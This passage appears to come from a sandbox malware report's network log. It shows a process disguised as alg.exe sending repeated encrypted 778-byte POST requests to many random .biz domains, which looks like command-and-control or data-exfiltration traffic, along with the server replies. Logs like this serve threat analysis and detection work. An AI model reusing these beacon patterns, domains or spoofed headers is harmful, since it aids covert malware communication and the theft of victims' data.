                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.418077946 CET778OUTData Raw: 78 76 39 25 77 36 08 d2 fe 02 00 00 62 31 86 af ea 23 df 7b e3 ec 09 41 00 11 b5 d7 6c 77 d7 38 59 1e 88 4a c4 cd 0c 62 66 39 95 57 bb e8 3e 94 4c 28 8e 91 cf c2 0a 02 b1 40 08 78 0c 9c 1b 6b d0 f2 84 3c c5 ef 54 d1 46 01 20 5c 16 d6 5e 6f 39 bb
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: xv9%w6b1#{Alw8YJbf9W>L(@xk<TF \^o9@F$r0120>nnwTYU(W3]A.e$^b9F6o-$J>!OGeW\=(GIKoO266"cY@nzjaa
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:06.862579107 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=75a5d7541f096ab5a20c3c8a13c7ff80|155.94.241.188|1730130666|1730130666|0|1|0; path=/; domain=.wllvnzb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  34192.168.2.55000918.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.212038994 CET345OUTPOST /tlre HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: gnqgo.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.212064028 CET778OUTData Raw: 64 3d 56 53 f1 03 fb b9 fe 02 00 00 22 c9 94 2c 6f ef 08 a3 af a5 4b 85 c3 20 c3 63 c2 af 26 2d 36 b4 e4 de 37 90 86 35 07 39 73 a5 ce 67 47 7e e1 26 d0 c5 7f 1f 73 b9 cc 07 97 9e d5 ca ce 36 86 ff 4c 96 6c 12 45 ee 94 36 2a 54 e4 e0 fc 41 ad 37
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: d=VS",oK c&-6759sgG~&s6LlE6*TA7R"tr3QF5rCr=bmXR_9jiW/ns e3jq}?ww"y4rmri5es
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.875771999 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=73e8c0ab4e3c44063b31ff900e2ab99a|155.94.241.188|1730130667|1730130667|0|1|0; path=/; domain=.gnqgo.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  35192.168.2.55001044.221.84.105802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496460915 CET346OUTPOST /tj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.496480942 CET778OUTData Raw: bb 41 f9 e4 1b 00 65 ea fe 02 00 00 0c ce e5 00 71 5a 78 1b fe 7b ef 4d b9 52 fb 74 0a 14 e5 61 c0 51 f2 b2 f1 f8 b0 05 2d 1f 7b 4e 5d 5d 34 48 de 8f c3 05 c2 cd 63 d9 d0 20 15 82 ff 3f 4a 07 e1 34 a6 8c 13 4c 88 0f 65 1b 51 25 3c fd c5 85 ac aa
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: AeqZx{MRtaQ-{N]]4Hc ?J4LeQ%<|*z1^l}z2r?scKz(WT.>A(Kjwar:S_=*#h7 .v?`8e*=7gNiR/&b%eoSv
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.173051119 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=8d408b1c3469e393eb44a625ae59c77c|155.94.241.188|1730130669|1730130669|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  36192.168.2.55001118.141.10.107802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642513990 CET347OUTPOST /ewf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.642548084 CET778OUTData Raw: 7a 07 df cb db a4 0e 70 fe 02 00 00 ac ca bd 27 f5 0e 40 58 e9 7a 52 24 c1 72 3f 9c 60 ac 18 51 20 03 bd c4 c2 44 37 d7 c9 47 a8 e5 8b 82 0a dd 83 61 0d 69 12 72 e1 5b db df cc 56 22 91 95 fd 1b 93 ac 68 8d 79 eb 44 b7 ad 72 93 22 b0 c3 bd 34 8b
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: zp'@XzR$r?`Q D7Gair[V"hyDr"4g"WDLE4&fN_=sfU$vE@AUpZ^ Z&[VXZ4}0`dL^_2*k*F.SPUReasFXZ?o$*}iKE^~RtUtj
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.084306002 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=253a3806f9c259280561d5e2ce9c873c|155.94.241.188|1730130670|1730130670|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  37192.168.2.55001218.246.231.120802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.343101978 CET355OUTPOST /vdqmhlkrsphqhe HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.343113899 CET778OUTData Raw: 34 1f 7b 3a f3 99 26 33 fe 02 00 00 72 4e 94 d8 4a 4c cb 2c 51 8b 7a 79 34 81 4e 72 65 c6 8e 2c 92 ce 54 b3 d2 87 2f 4c 5d 48 ef 44 3e 39 3e 5e 2a 28 46 81 28 7b c0 6b 89 cc bb 21 56 61 c7 d7 91 de e9 2a 5a f9 f2 90 7c 7d 1e 10 ac 08 1f 4d f0 79
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 4{:&3rNJL,Qzy4Nre,T/L]HD>9>^*(F({k!Va*Z|}MyaCF;'1T(ukvqm02x}ZIG4i_y/P:L2[6p!kT|%/m%VwSNX05{4,T~K.d2]'~T#
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.182885885 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:12 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=ebd04cd36d95deaa954bafe702363840|155.94.241.188|1730130672|1730130672|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  38192.168.2.55001318.208.156.248802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.522211075 CET360OUTPOST /yqjotihouwfthlkr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.522242069 CET778OUTData Raw: 27 ab e4 16 5c a8 57 c5 fe 02 00 00 85 f8 20 2e 2a 07 40 b5 b1 11 5e 9f 7f e7 7f 0b a4 9b 5d 82 4d 36 88 8d a8 c2 2a 1d cc b5 6d 5a 0a 4e fb 88 53 f6 1a 05 f1 7d 74 00 06 93 3d fc 78 63 27 8b d7 7c 95 63 90 5d be 88 d4 c3 42 63 f1 14 e0 c0 a1 1f
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: '\W .*@^]M6*mZNS}t=xc'|c]Bc583l6l\e3oZ-*r)l&']%/.Dig4=ie58vX\d=.fm'#VbyE6W9}G(-KxjO#aRp$
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.197910070 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=12406b6a2ea71b24657099ea48943793|155.94.241.188|1730130673|1730130673|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  39192.168.2.55001413.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852926970 CET352OUTPOST /oukjvuscvd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.852967024 CET778OUTData Raw: 18 07 48 87 37 92 2d 88 fe 02 00 00 09 d0 ca e3 31 a3 58 44 7a ca c8 92 d6 e1 b0 70 48 9f ed c8 69 58 ac 2f c7 5f 40 de df 24 95 e9 41 8b 20 ad 64 8e ee 58 b6 10 4a 8c d8 3b 4d 5a ce f9 fb 47 d4 58 19 22 77 d0 ab 1d 60 57 20 9e a0 21 ef 90 b4 c5
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: H7-1XDzpHiX/_@$A dXJ;MZGX"w`W !+wd.64s1TC$7Z52uxQJ>/qUmdmK$n\W2-jn_s7RM0%"4UGzW[d4TBNPmE;\>
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.280266047 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:15 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=b57fab398cf5da72a6d4a90829302016|155.94.241.188|1730130675|1730130675|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  40192.168.2.55001513.251.16.150802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481921911 CET348OUTPOST /ohp HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: sxmiywsfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.481982946 CET778OUTData Raw: d2 38 e7 2b 97 1a f2 32 fe 02 00 00 66 48 60 a6 b4 9c 14 40 a7 9e 6a 93 4d 55 e3 19 08 d5 c1 38 3a 88 dc 5c 2b 0e 3b 89 e1 d1 75 9d f9 7b a8 cf 30 2a 87 89 28 8c 4c 56 7a 3f 1a 29 7a 89 30 63 e6 0d 34 89 b2 c2 30 a8 90 ad 6a ed 98 a5 fd 64 1b ff
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 8+2fH`@jMU8:\+;u{0*(LVz?)z0c40jd=K8((]Gmz^mlqI05jln}olZlLk{3lQ7Qx-0OF${0;M"PCdV0to^Me?xg<WKZV
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.914385080 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:16 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=df06495c9c883e14e3ae024f40910d01|155.94.241.188|1730130676|1730130676|0|1|0; path=/; domain=.sxmiywsfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  41192.168.2.55001734.211.97.45802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136723042 CET347OUTPOST /ava HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: vrrazpdh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.136785030 CET778OUTData Raw: f2 f8 c3 bb fe 22 9d 63 fe 02 00 00 8c 8d be 2a d5 02 8b db 5b bf 45 cc e6 0e 1a ac ad 53 c0 bd 0a fc c8 76 d3 0c c5 0d 48 9e d0 8e 6f 85 c6 6a 42 86 1d 18 8d 45 89 f2 07 d3 67 d6 ba d8 f6 5b 1d ed f0 2d ef b8 f7 4a f6 e5 eb b6 25 75 9a c9 20 dc
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: "c*[ESvHojBEg[-J%u /y|N 3:sc;Ui%W+O`#C]STz>&>Q<3K&A2U0$dwu:Q-OaDgg.crkl;=
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.021253109 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.022437096 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.023762941 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                  Date: Mon, 28 Oct 2024 15:51:17 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: btst=de4ecc2c75d0b1e7dde0b4b734f99884|155.94.241.188|1730130677|1730130677|0|1|0; path=/; domain=.vrrazpdh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                  Set-Cookie: snkz=155.94.241.188; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                  42192.168.2.55001847.129.31.212802636C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.114883900 CET349OUTPOST /xmqlmgb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                  Host: ftxlah.biz
